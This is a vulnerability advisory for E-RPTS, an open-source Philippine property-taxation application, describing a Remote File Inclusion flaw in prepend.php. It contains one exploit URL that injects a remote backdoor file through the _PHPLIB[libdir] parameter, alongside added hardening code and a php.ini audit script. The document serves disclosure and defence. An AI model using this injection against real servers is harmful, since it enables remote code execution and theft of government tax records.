About E-RPTS

(from the website)
An Open Source solution for Real Property Taxation in the Philippines

Part of the eLGU-eGOV set of packages developed by NCC for Local Government Units (LGUs), e.g. municipalities. Other eLGU packages are eBPLS (Business Permits & Licensing) and eTOMS (Treasury Operations Management).

eRPTS is a web- and GIS-ready application that maintains a database of properties and owners for LGUs, consistent with Provincial and National government standards. It also generates reports that allow LGUs to improve their monitoring of compliance and revenue generation.

This is a critical vulnerability since the software is being implemented in each of the Philippine government's Local Government Units and could expose sensitive data such as tax records and other business-related details.

The vulnerability

in the file /includes/web/prepend.php, lines 20-30:

require($_PHPLIB["libdir"] . "common.inc");
require($_PHPLIB["libdir"] . "constants.php");
require($_PHPLIB["libdir"] . "setup.inc");
require($_PHPLIB["libdir"] . "session.inc");
require($_PHPLIB["libdir"] . "auth.inc");
require($_PHPLIB["libdir"] . "perm.inc");
require($_PHPLIB["libdir"] . "db_mysql.inc");
require($_PHPLIB["libdir"] . "tr_rpts.inc");
require($_PHPLIB["libdir"] . "ct_split_mysql.inc");
require($_PHPLIB["libdir"] . "page.inc");
require($_PHPLIB["libdir"] . "template.inc");

This code is vulnerable to Remote File Inclusion. With register_globals on, $_PHPLIB["libdir"] can be supplied as a request parameter, and require() then fetches every library file from the location given in the request, e.g.:

http://victim.com/nccweb/index.php?_PHPLIB[libdir]=http://path.to.phpbackdoor.txt?

For this vulnerability to work, both register_globals and allow_url_fopen must be set to on.
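A hardened form of the include pattern above, added here as an example; it is not code from E-RPTS or PHPLIB. It assumes a library directory located relative to prepend.php (the RPTS_LIBDIR constant) and uses two helper functions, rpts_lib_path() and rpts_require_lib(), that are this example's own names. The point is that $_PHPLIB['libdir'] is assigned server-side before any require(), so a value injected through register_globals is discarded, and that every library path is checked to be a plain file inside that directory before it is loaded:

```php
<?php
// Added example, not E-RPTS or PHPLIB code. RPTS_LIBDIR and the helper
// names below are assumptions made for this illustration.

// The library directory is fixed server-side, before any require().
// With register_globals on, a request parameter _PHPLIB[libdir] creates
// $_PHPLIB['libdir'] before this script runs; resetting the array here
// discards that value. dirname(__FILE__) is used instead of __DIR__ so
// the code also runs on the PHP 4/5.x versions E-RPTS was written for.
define('RPTS_LIBDIR', dirname(__FILE__) . '/../../phplib/'); // assumed layout
$_PHPLIB = array();
$_PHPLIB['libdir'] = RPTS_LIBDIR;

/**
 * Resolve a bare library file name against the fixed directory.
 * Returns the real path, or false if the name carries a URL scheme,
 * a directory component, or resolves outside the directory.
 */
function rpts_lib_path($base, $name)
{
    // Anything that looks like "scheme:" (http:, ftp:, php:, data:) or
    // that carries a path component is not a library file name.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $name)
        || strpos($name, '/') !== false || strpos($name, "\\") !== false
        || strpos($name, '..') !== false) {
        return false;
    }
    $base_real = realpath($base);
    $file_real = realpath($base . $name);
    if ($base_real === false || $file_real === false || !is_file($file_real)) {
        return false;
    }
    $base_real = rtrim($base_real, '/') . '/';
    // The resolved file must sit directly under the resolved base.
    if (strncmp($file_real, $base_real, strlen($base_real)) !== 0) {
        return false;
    }
    return $file_real;
}

/** require() a library by bare name, failing closed on any rejection. */
function rpts_require_lib($name)
{
    $path = rpts_lib_path(RPTS_LIBDIR, $name);
    if ($path === false) {
        error_log("prepend.php: refusing to load library '$name'");
        exit(1); // never fall back to include_path or a URL wrapper
    }
    require $path;
}

// Same libraries as the vulnerable prepend.php, now loaded only from RPTS_LIBDIR.
$rpts_libs = array('common.inc', 'constants.php', 'setup.inc', 'session.inc',
                   'auth.inc', 'perm.inc', 'db_mysql.inc', 'tr_rpts.inc',
                   'ct_split_mysql.inc', 'page.inc', 'template.inc');
foreach ($rpts_libs as $rpts_lib) {
    rpts_require_lib($rpts_lib);
}
```

The realpath() containment check is what actually closes the hole; the explicit scheme and path-separator tests in front of it only make the rejection cheap and leave a clear log line when someone tampers with the name. This belongs alongside, not instead of, turning register_globals and allow_url_fopen off.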


Recommendations

You should disable allow_url_fopen in the php.ini file:

allow_url_fopen = Off

The setting can also be disabled in Apache's httpd.conf file:

php_flag  allow_url_fopen  off
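A small command-line audit of the settings this vulnerability depends on, added as an example; it is not part of the advisory or of E-RPTS, and the function names are its own. audit_rfi_settings() takes the directives as an array so it can be fed either the live values from ini_get() or the output of parse_ini_file() on a php.ini copied from the server. It also checks allow_url_include, which exists from PHP 5.2 on and governs include/require of URLs on those versions:

```php
<?php
// Added example, not part of the advisory or of E-RPTS. Function names are
// this example's own. Run it with the same php.ini the web server loads
// (php -c /path/to/php.ini audit.php); php_flag lines in httpd.conf apply
// only to mod_php and are not visible to the CLI, so check those by hand.

/** PHP treats 1/On/True/Yes (case-insensitive) as an enabled flag. */
function ini_is_on($value)
{
    $v = strtolower(trim((string) $value));
    return in_array($v, array('1', 'on', 'true', 'yes'), true);
}

/**
 * Return a list of findings for the directives that make the
 * _PHPLIB[libdir] include remotely exploitable. $settings maps directive
 * name to value; a missing key means the directive does not exist in this
 * PHP version (register_globals was removed in 5.4, allow_url_include
 * was added in 5.2).
 */
function audit_rfi_settings(array $settings)
{
    $findings = array();
    if (isset($settings['register_globals']) && ini_is_on($settings['register_globals'])) {
        $findings[] = 'register_globals is On: request parameters such as '
                    . '_PHPLIB[libdir] become PHP variables';
    }
    if (isset($settings['allow_url_fopen']) && ini_is_on($settings['allow_url_fopen'])) {
        $findings[] = 'allow_url_fopen is On: URL wrappers are available to fopen() '
                    . 'and, before PHP 5.2, to require()';
    }
    if (isset($settings['allow_url_include']) && ini_is_on($settings['allow_url_include'])) {
        $findings[] = 'allow_url_include is On: include/require accept URLs';
    }
    return $findings;
}

/**
 * Collect the live values from the running PHP. ini_get() returns false
 * for a directive this PHP version does not know, which is simply omitted.
 */
function collect_live_settings()
{
    $settings = array();
    foreach (array('register_globals', 'allow_url_fopen', 'allow_url_include') as $d) {
        $v = ini_get($d);
        if ($v !== false) {
            $settings[$d] = $v;
        }
    }
    return $settings;
}

// Constructed php.ini fragment mirroring the vulnerable configuration;
// parse_ini_string() (PHP 5.3+) maps On/Off to "1"/"" just as
// parse_ini_file() does for a real php.ini.
$sample_ini = "register_globals = On\nallow_url_fopen = On\n";
foreach (audit_rfi_settings(parse_ini_string($sample_ini)) as $f) {
    echo "sample: $f\n";
}

// The same check against the PHP that is actually running this script.
foreach (audit_rfi_settings(collect_live_settings()) as $f) {
    echo "live: $f\n";
}
```

On the constructed sample the script reports the two findings named in the advisory; on a correctly configured server it prints nothing for the live check.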

This is actually an old PHPLIB vulnerability, reported in [1]. Unfortunately, the E-RPTS developers did not update to the latest PHPLIB version.

__________________
Bug Discovered by:
John Homer Alvero
__________________


References: